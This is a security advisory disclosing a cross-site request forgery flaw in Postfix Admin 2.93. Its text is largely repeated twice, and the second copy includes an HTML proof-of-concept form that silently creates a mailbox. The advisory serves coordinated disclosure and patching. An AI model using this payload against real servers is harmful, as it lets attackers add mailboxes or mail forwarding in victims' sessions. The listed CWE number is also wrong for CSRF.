1. ADVISORY INFORMATION
=======================
Product: Postfix Admin
Vendor URL: sourceforge.net/projects/postfixadmin/
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2016-04-23
Date published: 2016-05-21
CVSSv3 Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Postfix Admin v2.93 (latest)
older versions may be affected too.
4. INTRODUCTION
===============
Postfix Admin is a Web Based Management tool created for Postfix. It is a
PHP based application that handles Postfix Style Virtual Domains and Users
that are stored in MySQL or PostgreSQL.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application "Postfix Admin" offers different configuration options via
HTTP GET and HTTP POST. While GET-based operations like deleting a mailbox
are protected by a CSRF-token called "token", other functions which are
based on HTTP POST like adding email forwarding settings, adding new
mailboxes or adding aliases are not protected at all, which makes them
vulnerable to CSRF attacks.
The following Proof-of-Concept triggers this vulnerability and adds a new
mailbox:
6. RISK
=======
To successfully exploit this vulnerability, a user must be tricked into
visiting an arbitrary website while having an authenticated session in
Postfix Admin. Basically both types of user accounts (mailbox users and
administrators) are affected, but the mailbox user's only exploitable
functionality is adding email forwarding settings.
The vulnerability allows remote attackers to perform sensitive actions
like adding new mailboxes or adding email forwardings in the authentication
context of the targeted user.
7. SOLUTION
===========
Checkout latest trunk including [r1843].
8. REPORT TIMELINE
==================
2016-04-23: Discovery of the vulnerability
2016-04-23: Created https://sourceforge.net/p/postfixadmin/bugs/372/
2016-05-20: Vendor committed patch to SVN trunk r1842
2016-05-21: Advisory released
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Postfix Admin
Vendor URL: sourceforge.net/projects/postfixadmin/
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2016-04-23
Date published: 2016-05-21
CVSSv3 Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Postfix Admin v2.93 (latest)
older versions may be affected too.
4. INTRODUCTION
===============
Postfix Admin is a Web Based Management tool created for Postfix. It is a
PHP based application that handles Postfix Style Virtual Domains and Users
that are stored in MySQL or PostgreSQL.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application "Postfix Admin" offers different configuration options via
HTTP GET and HTTP POST. While GET-based operations like deleting a mailbox
are protected by a CSRF-token called "token", other functions which are
based on HTTP POST like adding email forwarding settings, adding new
mailboxes or adding aliases are not protected at all, which makes them
vulnerable to CSRF attacks.
The following Proof-of-Concept triggers this vulnerability and adds a new
mailbox:
<html>
<body>
<form
action="https://localhost/edit.php?table=mailbox&domain=localhost.com"
method="POST">
<input type="hidden" name="table" value="mailbox" />
<input type="hidden" name="value[local_part]"
value="test1234" />
<input type="hidden" name="value[domain]"
value="localhost.com" />
<input type="hidden" name="value[password]" value="rcesec" />
<input type="hidden" name="value[password2]" value="rcesec" />
<input type="hidden" name="value[name]" value="rcesec" />
<input type="hidden" name="value[quota]" value="10000" />
<input type="hidden" name="value[active]" value="1" />
<input type="hidden" name="submit" value="Add Mailbox" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability, a user must be tricked into
visiting an arbitrary website while having an authenticated session in
Postfix Admin. Basically both types of user accounts (mailbox users and
administrators) are affected, but the mailbox user's only exploitable
functionality is adding email forwarding settings.
The vulnerability allows remote attackers to perform sensitive actions
like adding new mailboxes or adding email forwardings in the authentication
context of the targeted user.
7. SOLUTION
===========
Checkout latest trunk including [r1843].
8. REPORT TIMELINE
==================
2016-04-23: Discovery of the vulnerability
2016-04-23: Created https://sourceforge.net/p/postfixadmin/bugs/372/
2016-05-20: Vendor committed patch to SVN trunk r1842
2016-05-21: Advisory released
9. REFERENCES
=============
https://sourceforge.net/p/postfixadmin/bugs/372/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJXQC5pAAoJELLTnL9hzYr62yMP/RtPNSlQseKc+lcpCtVJquFt
1tyAy2g946n6ouSAVq3g40LEFDtkxCkQe3o/39Bp/4uX3S6b7vz0yJGBzw6qj/4R
lN/zprCuob09JMEagHv65TeZuZFx4f3D2YOTk6LwTifczFJM2oYbskpixIC1OlAt
ne+ix5Q6LUa5GjD/1KlqhJKF7LQ+WcQiIhhvq3lwt+vntu69H2GhHEj057mNLRQp
XVhsxzZnr8gFBvED8GmdJwIoFAZAb01k2MTi0qYXywUZF9Cw6PdUsnr6tZEJslPk
tMijPz1bu+tAyoSY7euPnQ8NQYKNndQTivF8gwfCMYvmLij7TebJSCPLYcfhhNs8
U7vxzQsA4AQXxhDMiIsQDU9ZBMS4e+3OwLiScjlKR/Nz6eEEizHhF77SawcRecV7
tw8VQlOABoMVaLoPcu2gCsQ4qVQHEpYIP6wlWStVhHS6AeTYTit685SqBulK0xLY
9qIN00LFi1sF8yAlCygGYR7AwtThBRyC4W9zARw/1jbcLBpvaN0+6qx6nVfIwvqU
CHYVba1a1FNBgY2CivExhDNjzwltj6XoDF7KW0O1RlyZep46SgEpK7zTAzEZ13rj
7XUxbt9zGU+CwRZaYxQ3KRkQ6ZVh9Z4AvfRmrygDUFHmSRflHZmbD0fpCAxNxJkV
p0Qn2vBWa3uQZORzgKBz
=KOJI
-----END PGP SIGNATURE-----
[ reply ]